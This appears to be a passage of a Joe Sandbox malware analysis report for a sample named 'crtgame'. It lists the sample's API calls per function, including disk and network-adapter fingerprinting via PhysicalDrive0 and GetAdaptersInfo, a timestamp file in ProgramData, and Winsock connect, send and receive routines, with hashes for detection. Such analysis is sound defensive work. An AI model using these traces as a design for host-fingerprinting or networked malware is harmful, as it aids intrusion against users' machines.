                                                                                             [Rendered graph omitted. Basic blocks 2a3f3a0 to 2a3f48a; calls in the graph: LoadLibraryA, GetProcAddress, GetAdaptersInfo, FreeLibrary, and subroutines 2a431a8, 2a3f082, 2a4354c.]
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(iphlpapi.dll,?), ref: 02A3F3B6
                                                                                            • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02A3F3CF
                                                                                            • GetAdaptersInfo.IPHLPAPI(?,00000000,?,00000000), ref: 02A3F3F4
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 02A3F47D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                            • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                            • API String ID: 514930453-3114217049
                                                                                            • Opcode ID: ca110dc9fd7588dd05824d2058029b5be7787b7f45a7efcbd0c7cc467d0511e2
                                                                                            • Instruction ID: e0875d0af8caf12a9dddbafbdc4decba92536c4012a95aabfa1fc18d80eba41e
                                                                                            • Opcode Fuzzy Hash: ca110dc9fd7588dd05824d2058029b5be7787b7f45a7efcbd0c7cc467d0511e2
                                                                                            • Instruction Fuzzy Hash: E521A571E14219AFDB15DBA8D8806EEBBF8BF05324F1441A9F945E7A01EF348945CBA0

                                                                                             Control-flow Graph

                                                                                             [Rendered graph omitted. Basic blocks 2a32b95 to 2a32d38; calls in the graph: WSASetLastError, WSARecv, select, and subroutines 2a40510, 2a39e92, 2a3166f, 2a31996.]
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000,00000000,505C3A43,00000000), ref: 02A32BE4
                                                                                            • WSARecv.WS2_32(?,?,00000002,?,?,00000000,00000000), ref: 02A32C07
                                                                                              • Part of subcall function 02A39E92: WSAGetLastError.WS2_32(?,00000080,00000017,02A33114), ref: 02A39EA0
                                                                                            • WSASetLastError.WS2_32(?,?,?,?,00000000), ref: 02A32CD3
                                                                                            • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02A32CE7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$Recvselect
                                                                                            • String ID: 3'
                                                                                            • API String ID: 886190287-280543908
                                                                                            • Opcode ID: 778c3259d9706de132005ed88878e6287c81ec2b267e04c56d377dcf2cbe5724
                                                                                            • Instruction ID: 086bb11980dbc880a5da622078dde82afab0aeb10e94e1bc75bd1b60f1b9134d
                                                                                            • Opcode Fuzzy Hash: 778c3259d9706de132005ed88878e6287c81ec2b267e04c56d377dcf2cbe5724
                                                                                            • Instruction Fuzzy Hash: 80417AB19043059FD7229F64CA447ABBBE9EF94354F104D1EF99987280EFB4D940CBA2

                                                                                             Control-flow Graph

                                                                                             [Rendered graph omitted. Basic blocks 2a3f29c to 2a3f39f; calls in the graph: CreateFileA, DeviceIoControl, GetLastError, CloseHandle, and subroutines 2a431a8, 2a3f082, 2a4354c.]
                                                                                            APIs
                                                                                            • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000,?), ref: 02A3F2BB
                                                                                            • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,00000000,00000000), ref: 02A3F2F9
                                                                                            • GetLastError.KERNEL32 ref: 02A3F35A
                                                                                            • CloseHandle.KERNELBASE(?), ref: 02A3F391
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                            • String ID: \\.\PhysicalDrive0
                                                                                            • API String ID: 4026078076-1180397377
                                                                                            • Opcode ID: b429570a74ee1d5d904d6f7d54a02cc34a628c69b80032997455dae15de38564
                                                                                            • Instruction ID: f1a3d206efcb3140de771195b264102b59bb957b0d963843215cfce50f6a3300
                                                                                            • Opcode Fuzzy Hash: b429570a74ee1d5d904d6f7d54a02cc34a628c69b80032997455dae15de38564
                                                                                            • Instruction Fuzzy Hash: D031B071E10219EFDB25DF94D884AAEBBB8FF44714F2041A9F515E3680DB749A05CB90

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • _malloc.LIBCMT ref: 02A35C48
                                                                                              • Part of subcall function 02A429AC: __FF_MSGBANNER.LIBCMT ref: 02A429C3
                                                                                              • Part of subcall function 02A429AC: __NMSG_WRITE.LIBCMT ref: 02A429CA
                                                                                              • Part of subcall function 02A429AC: RtlAllocateHeap.NTDLL(00920000,00000000,00000001), ref: 02A429EF
                                                                                            • _memset.LIBCMT ref: 02A35C5B
                                                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000023,00000000,?,?,?,00000000), ref: 02A35C68
                                                                                            • lstrcpyW.KERNEL32(C:\ProgramData\rc.dat,00000000,?,?,?,00000000), ref: 02A35C70
                                                                                            • lstrcatW.KERNEL32(C:\ProgramData\rc.dat,\ts.dat,?,?,?,00000000), ref: 02A35C7C
                                                                                            • CreateFileW.KERNELBASE(C:\ProgramData\rc.dat,80000000,00000000,00000000,00000003,00000020,00000000,?,?,?,00000000), ref: 02A35C95
                                                                                            • ReadFile.KERNEL32(00000000,?,00000008,?,00000000,?,?,?,00000000), ref: 02A35CAA
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 02A35CB1
                                                                                            • __time64.LIBCMT ref: 02A35CC5
                                                                                            • CreateFileW.KERNELBASE(C:\ProgramData\rc.dat,40000000,00000000,00000000,00000002,00000022,00000000,?,?,?,00000000), ref: 02A35CE2
                                                                                            • WriteFile.KERNELBASE(00000000,?,00000008,?,00000000,?,?,?,00000000), ref: 02A35CF7
                                                                                            • CloseHandle.KERNELBASE(00000000,?,?,?,00000000), ref: 02A35CFE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateHandle$AllocateFolderHeapPathReadSpecialWrite__time64_malloc_memsetlstrcatlstrcpy
                                                                                            • String ID: C:\ProgramData\rc.dat$\ts.dat
                                                                                            • API String ID: 204396691-2903805982
                                                                                            • Opcode ID: b9f67d46fc8c28140d7e2c8f2cd9c58def92ce16375bb8d8682bacde2d474e42
                                                                                            • Instruction ID: 498b71ee69ed3811cefae749fe47eef02cb8c092f8cb5d426a4c8681a21db47e
                                                                                            • Opcode Fuzzy Hash: b9f67d46fc8c28140d7e2c8f2cd9c58def92ce16375bb8d8682bacde2d474e42
                                                                                            • Instruction Fuzzy Hash: 6121B2729402187FE310AAA8AC88FBFF7ACEF89768F504555F905A3180DF749D0A4B61

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02A31D11
                                                                                            • GetLastError.KERNEL32 ref: 02A31D23
                                                                                              • Part of subcall function 02A31712: __EH_prolog.LIBCMT ref: 02A31717
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02A31D59
                                                                                            • GetLastError.KERNEL32 ref: 02A31D6B
                                                                                            • __beginthreadex.LIBCMT ref: 02A31DB1
                                                                                            • GetLastError.KERNEL32 ref: 02A31DC6
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02A31DDD
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02A31DEC
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02A31E14
                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 02A31E1B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                                            • String ID: thread$thread.entry_event$thread.exit_event
                                                                                            • API String ID: 831262434-3017686385
                                                                                            • Opcode ID: 7f77025ac0a61c5e04699d2091c1012c8ee9c56a0469d3c1e2cd0a81a6d7c13f
                                                                                            • Instruction ID: 72b70b7ef62cebc26cc2b5199ce02126ff759dbe57e4c94c8b85ae5e13404cc9
                                                                                            • Opcode Fuzzy Hash: 7f77025ac0a61c5e04699d2091c1012c8ee9c56a0469d3c1e2cd0a81a6d7c13f
                                                                                            • Instruction Fuzzy Hash: 1A316971A443119FD701EF24C888B2BBBE5EF84754F10492AF9599B290EF71D84ACF92

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A34CB6
                                                                                            • RtlEnterCriticalSection.NTDLL(02A673D8), ref: 02A34CE2
                                                                                            • RtlLeaveCriticalSection.NTDLL(02A673D8), ref: 02A34CEE
                                                                                              • Part of subcall function 02A34B18: __EH_prolog.LIBCMT ref: 02A34B1D
                                                                                              • Part of subcall function 02A34B18: InterlockedExchange.KERNEL32(?,00000000), ref: 02A34C1D
                                                                                            • RtlEnterCriticalSection.NTDLL(02A673D8), ref: 02A34DBE
                                                                                            • RtlLeaveCriticalSection.NTDLL(02A673D8), ref: 02A34DC4
                                                                                            • RtlEnterCriticalSection.NTDLL(02A673D8), ref: 02A34DCB
                                                                                            • RtlLeaveCriticalSection.NTDLL(02A673D8), ref: 02A34DD1
                                                                                            • RtlEnterCriticalSection.NTDLL(02A673D8), ref: 02A34FD2
                                                                                            • RtlLeaveCriticalSection.NTDLL(02A673D8), ref: 02A34FD8
                                                                                            • RtlEnterCriticalSection.NTDLL(02A673D8), ref: 02A34FE3
                                                                                            • RtlLeaveCriticalSection.NTDLL(02A673D8), ref: 02A34FEC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                            • String ID:
                                                                                            • API String ID: 2062355503-0
                                                                                            • Opcode ID: 526694ee27ee8f59312db12145c6d569c0346cdb7476895dd18cc031677156b1
                                                                                            • Instruction ID: f2edd9204ea434af665f9549d8346a50ef290c1d6cbc63cef9cc6d5ae9bb379d
                                                                                            • Opcode Fuzzy Hash: 526694ee27ee8f59312db12145c6d569c0346cdb7476895dd18cc031677156b1
                                                                                            • Instruction Fuzzy Hash: B9B13971D4425DAEDF22DF90C984BEEBBB5AF09314F14409AF805B6280DFB86A49CF51

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02A32706
                                                                                            • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02A3272B
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02A55553), ref: 02A32738
                                                                                              • Part of subcall function 02A31712: __EH_prolog.LIBCMT ref: 02A31717
                                                                                            • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02A32778
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02A327D9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                            • String ID: timer
                                                                                            • API String ID: 4293676635-1792073242
                                                                                            • Opcode ID: 2d396a9a599e289e8b4adf4e511252978add5c6110d53fb94c4dd05486d9515a
                                                                                            • Instruction ID: 5d28aade6e5d4dcf5ebfc40bb707d2fbfd2ebc55de2b964b3c9dbe6cd450501b
                                                                                            • Opcode Fuzzy Hash: 2d396a9a599e289e8b4adf4e511252978add5c6110d53fb94c4dd05486d9515a
                                                                                            • Instruction Fuzzy Hash: E9317CB1944715EFD311DF25C984B17BBE8FB48724F104A2AF85592A80DB70D814CF91

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 02A3F29C: CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000,?), ref: 02A3F2BB
                                                                                              • Part of subcall function 02A3F29C: DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,00000000,00000000), ref: 02A3F2F9
                                                                                              • Part of subcall function 02A3F29C: GetLastError.KERNEL32 ref: 02A3F35A
                                                                                              • Part of subcall function 02A3F29C: CloseHandle.KERNELBASE(?), ref: 02A3F391
                                                                                              • Part of subcall function 02A3F3A0: LoadLibraryA.KERNEL32(iphlpapi.dll,?), ref: 02A3F3B6
                                                                                              • Part of subcall function 02A3F3A0: GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02A3F3CF
                                                                                              • Part of subcall function 02A3F3A0: GetAdaptersInfo.IPHLPAPI(?,00000000,?,00000000), ref: 02A3F3F4
                                                                                              • Part of subcall function 02A3F3A0: FreeLibrary.KERNEL32(00000000), ref: 02A3F47D
                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104,?,00000000,00000000), ref: 02A3F235
                                                                                            • CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 02A3F256
                                                                                            • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02A3F26A
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02A3F273
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            • API ID: File$CloseCreateHandleLibrary$AdaptersAddressControlDeviceDirectoryErrorFreeInfoLastLoadProcTimeWindows
                                                                                            • String ID: tLVh
                                                                                            • API String ID: 1378705229-319918027
                                                                                            • Opcode ID: 95c26b17e5dc271b7e02cf4777d77bcd797b07332bf5f1d13989610ffeb4471c
                                                                                            • Instruction ID: cd9b7147057ac454e4e52667369d417913ececf137ee9c6ed1fdf9342456d5e5
                                                                                            • Opcode Fuzzy Hash: 95c26b17e5dc271b7e02cf4777d77bcd797b07332bf5f1d13989610ffeb4471c
                                                                                            • Instruction Fuzzy Hash: EE117C75D40328ABCB119BA8DC88EDEBB79BB09710F000619F515EB180DB705949CB90

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000,?,?,?,00000006,?,?), ref: 02A32A3B
                                                                                            • closesocket.WS2_32(?), ref: 02A32A42
                                                                                            • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02A32A89
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02A32A97
                                                                                            • closesocket.WS2_32(?), ref: 02A32A9E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            • API ID: ErrorLastclosesocket$ioctlsocket
                                                                                            • String ID:
                                                                                            • API String ID: 1561005644-0
                                                                                            • Opcode ID: a65842b010f542bf16e3646fdae3b604b868df271edd8ffa4cbe642a907f9d38
                                                                                            • Instruction ID: fccbe78d54b4df92dd5148de06f6dd6831e15cc4d3bde036809003f503d1018e
                                                                                            • Opcode Fuzzy Hash: a65842b010f542bf16e3646fdae3b604b868df271edd8ffa4cbe642a907f9d38
                                                                                            • Instruction Fuzzy Hash: A1212871E00315ABEB25ABB8898476EB7E9EF44315F10896AF945D7240FFB0CD418B61

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A31BAC
                                                                                            • RtlEnterCriticalSection.NTDLL ref: 02A31BBC
                                                                                            • RtlLeaveCriticalSection.NTDLL ref: 02A31BEA
                                                                                            • RtlEnterCriticalSection.NTDLL ref: 02A31C13
                                                                                            • RtlLeaveCriticalSection.NTDLL ref: 02A31C56
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 1633115879-0
                                                                                            • Opcode ID: 7d82a4eea781b1f225446f94066b8c42bf4c1d44a577b117923167913cda035b
                                                                                            • Instruction ID: fdd65d1a63623a1a72875d1296f2d10f7f1ff00cc94a21f67d4ed9ef298c1086
                                                                                            • Opcode Fuzzy Hash: 7d82a4eea781b1f225446f94066b8c42bf4c1d44a577b117923167913cda035b
                                                                                            • Instruction Fuzzy Hash: 2B218975A00314AFCB16CF68D984BAABBB5FF48714F108589FC59A7301DB74E906CBA0

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000,?,?,?,?,?,02A3358B,?,?,?,?,?,?,?,02A38FA9,?), ref: 02A32EEE
                                                                                            • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02A32EFD
                                                                                            • WSAGetLastError.WS2_32(?,02A3358B,?,?,?,?,?,?,?,02A38FA9,?,?,?,00000001,00000006,?), ref: 02A32F0C
                                                                                            • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02A32F36
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            • API ID: ErrorLast$Socketsetsockopt
                                                                                            • String ID:
                                                                                            • API String ID: 2093263913-0
                                                                                            • Opcode ID: e6e1ed79377e5d3198cef0296159573cc5e59ec8ff6ad94c70d4ffb9397730ab
                                                                                            • Instruction ID: eed87096b5c103c3fcdc5a4ec5142b65074f3fa40d774a38971fbd5dca1b516f
                                                                                            • Opcode Fuzzy Hash: e6e1ed79377e5d3198cef0296159573cc5e59ec8ff6ad94c70d4ffb9397730ab
                                                                                            • Instruction Fuzzy Hash: F7017571A40314BBDB205F65DC88B5FBBA9EB85771F008965FA08DB141DF70C8018BA1

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 02A32D39: WSASetLastError.WS2_32(00000000,?,?,00000001,?,?,02A33390,00000001,?,00000000,?,?,?,?,?), ref: 02A32D47
                                                                                              • Part of subcall function 02A32D39: WSASend.WS2_32(?,?,?,00000000,00000000,00000000,00000000), ref: 02A32D5C
                                                                                            • WSASetLastError.WS2_32(00000000,00000000,?,?), ref: 02A32E6D
                                                                                            • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02A32E83
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            • API ID: ErrorLast$Sendselect
                                                                                            • String ID: 3'
                                                                                            • API String ID: 2958345159-280543908
                                                                                            • Opcode ID: e547c7e264077bfbf8e711ed0a75886a3c77a306ceebf4b6b3d3b614237745d6
                                                                                            • Instruction ID: 8051b46338358ecb8cc1df79b0f5dbab8be8cd29192ab0c9ce7a33eb2067bb81
                                                                                            • Opcode Fuzzy Hash: e547c7e264077bfbf8e711ed0a75886a3c77a306ceebf4b6b3d3b614237745d6
                                                                                            • Instruction Fuzzy Hash: BE31BCB0E00319ABDB169FA0C9457EEBBEAEF44354F10885AED0597240EFB4D9408FA0

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000,?,?), ref: 02A32AEA
                                                                                            • connect.WS2_32(00000010,?,?), ref: 02A32AF5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            • API ID: ErrorLastconnect
                                                                                            • String ID: 3'
                                                                                            • API String ID: 374722065-280543908
                                                                                            • Opcode ID: 0b63a9c38a9f3929d9d6d56622b04fb33a19d5f4d05d6e80b1d8e3904e91db31
                                                                                            • Instruction ID: cd8fd1904e158d197dcadad9736c40484239394205b7f5b7bb951635a86bedbe
                                                                                            • Opcode Fuzzy Hash: 0b63a9c38a9f3929d9d6d56622b04fb33a19d5f4d05d6e80b1d8e3904e91db31
                                                                                            • Instruction Fuzzy Hash: CD21AA70D002146BDF15AFB4D5447EEBBBAEF84324F108599ED1997280EF7499019F91

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 3519838083-0
                                                                                            • Opcode ID: 8e981d1d4e6ecb99cb714674b5141d65a57adff90690fdaba9288f1c5185b4b2
                                                                                            • Instruction ID: 5d25d5cc19d7b1dce0fe189b0624071f49e37872cf955a07281c614cca08f7fe
                                                                                            • Opcode Fuzzy Hash: 8e981d1d4e6ecb99cb714674b5141d65a57adff90690fdaba9288f1c5185b4b2
                                                                                            • Instruction Fuzzy Hash: EB510AB190521ADFCB09DF68D5416AABBB1FF08320F14859AF8299B390DB74D911CF91

                                                                                            APIs
                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 02A336A7
                                                                                              • Part of subcall function 02A32420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02A32432
                                                                                              • Part of subcall function 02A32420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02A32445
                                                                                              • Part of subcall function 02A32420: RtlEnterCriticalSection.NTDLL(?), ref: 02A32454
                                                                                              • Part of subcall function 02A32420: InterlockedExchange.KERNEL32(?,00000001), ref: 02A32469
                                                                                              • Part of subcall function 02A32420: RtlLeaveCriticalSection.NTDLL(?), ref: 02A32470
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 1601054111-0
                                                                                            • Opcode ID: 66c702eee6b89792e4078a10987c3a4d3f5cae7138d9994dd4aa24836208f76f
                                                                                            • Instruction ID: ff20824e7d1a80ff368d7638b5311ac3969ee0e45a1e6864b1702af9b585b523
                                                                                            • Opcode Fuzzy Hash: 66c702eee6b89792e4078a10987c3a4d3f5cae7138d9994dd4aa24836208f76f
                                                                                            • Instruction Fuzzy Hash: 7011BFB5108208EBDF228F14DC85BAB7BA9EF00360F108556FE16D6690CF34D861CBD4
                                                                                            APIs
                                                                                            • __beginthreadex.LIBCMT ref: 02A41B06
                                                                                            • CloseHandle.KERNEL32(?,00000000,?,?,?,?,02A3A5DA,00000000), ref: 02A41B37
                                                                                            • ResumeThread.KERNELBASE(?,00000000,?,?,?,?,02A3A5DA,00000000), ref: 02A41B45
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseHandleResumeThread__beginthreadex
                                                                                            • String ID:
                                                                                            • API String ID: 1685284544-0
                                                                                            • Opcode ID: 79995047fd66a3250c905cfdf32cd2ceec9acd35f7f59fb70616175e8e4571b1
                                                                                            • Instruction ID: 3cf77133b10649a595dcd8e09bd53de3876a944ed6365008df4c49812a1d2166
                                                                                            • Opcode Fuzzy Hash: 79995047fd66a3250c905cfdf32cd2ceec9acd35f7f59fb70616175e8e4571b1
                                                                                            • Instruction Fuzzy Hash: CDF06271740204ABEB209F6DDCC4F91B3E8EF88725F24056AF658D7290DF71E8939A90
                                                                                            APIs
                                                                                            • InterlockedIncrement.KERNEL32(02A67524), ref: 02A31ABA
                                                                                            • WSAStartup.WS2_32(00000002,00000000), ref: 02A31ACB
                                                                                            • InterlockedExchange.KERNEL32(02A67528,00000000), ref: 02A31AD7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Interlocked$ExchangeIncrementStartup
                                                                                            • String ID:
                                                                                            • API String ID: 1856147945-0
                                                                                            • Opcode ID: 46b8a38e1f3353d7847286016adc73ded9822f9ffb12803a81d35348299d17fd
                                                                                            • Instruction ID: 4358baf95633c7c8b6c7ba8748a00959553b9cff790827ebb9200fed09cfca9e
                                                                                            • Opcode Fuzzy Hash: 46b8a38e1f3353d7847286016adc73ded9822f9ffb12803a81d35348299d17fd
                                                                                            • Instruction Fuzzy Hash: 14D05EB1D907146BF21067A4AC0EA7AF7ACFB04719F400A91FD7AD10C0EF50AD24C5A7
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02A34B1D
                                                                                              • Part of subcall function 02A31BA7: __EH_prolog.LIBCMT ref: 02A31BAC
                                                                                              • Part of subcall function 02A31BA7: RtlEnterCriticalSection.NTDLL ref: 02A31BBC
                                                                                              • Part of subcall function 02A31BA7: RtlLeaveCriticalSection.NTDLL ref: 02A31BEA
                                                                                              • Part of subcall function 02A31BA7: RtlEnterCriticalSection.NTDLL ref: 02A31C13
                                                                                              • Part of subcall function 02A31BA7: RtlLeaveCriticalSection.NTDLL ref: 02A31C56
                                                                                              • Part of subcall function 02A3DA84: __EH_prolog.LIBCMT ref: 02A3DA89
                                                                                              • Part of subcall function 02A3DA84: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A3DB08
                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02A34C1D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A31000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_2a31000_crtgame.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                                            • String ID:
                                                                                            • API String ID: 1927618982-0
                                                                                            • Opcode ID: 6bc569326f98703b0e7d72aa04f5a3bddfc4b93e8ff9d0c598310010fd9e805d
                                                                                            • Instruction ID: dd817389c3832c0dcc7012b562cd3c41ed88612e63559c0331212fa1f2e6ed44
                                                                                            • Opcode Fuzzy Hash: 6bc569326f98703b0e7d72aa04f5a3bddfc4b93e8ff9d0c598310010fd9e805d
                                                                                            • Instruction Fuzzy Hash: 51510CB1D04248DFDB16DFA8C984AEEFFB5AF08314F14815AE906A7351DB709A44CF60
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000,?,?,00000001,?,?,02A33390,00000001,?,00000000,?,?,?,?,?), ref: 02A32D47
                                                                                            • WSASend.WS2_32(?,?,?,00000000,00000000,00000000,00000000), ref: 02A32D5C
                                                                                              • Part of subcall function 02A39E92: WSAGetLastError.WS2_32(?,00000080,00000017,02A33114), ref: 02A39EA0
                                                                                            Memory Dump Source
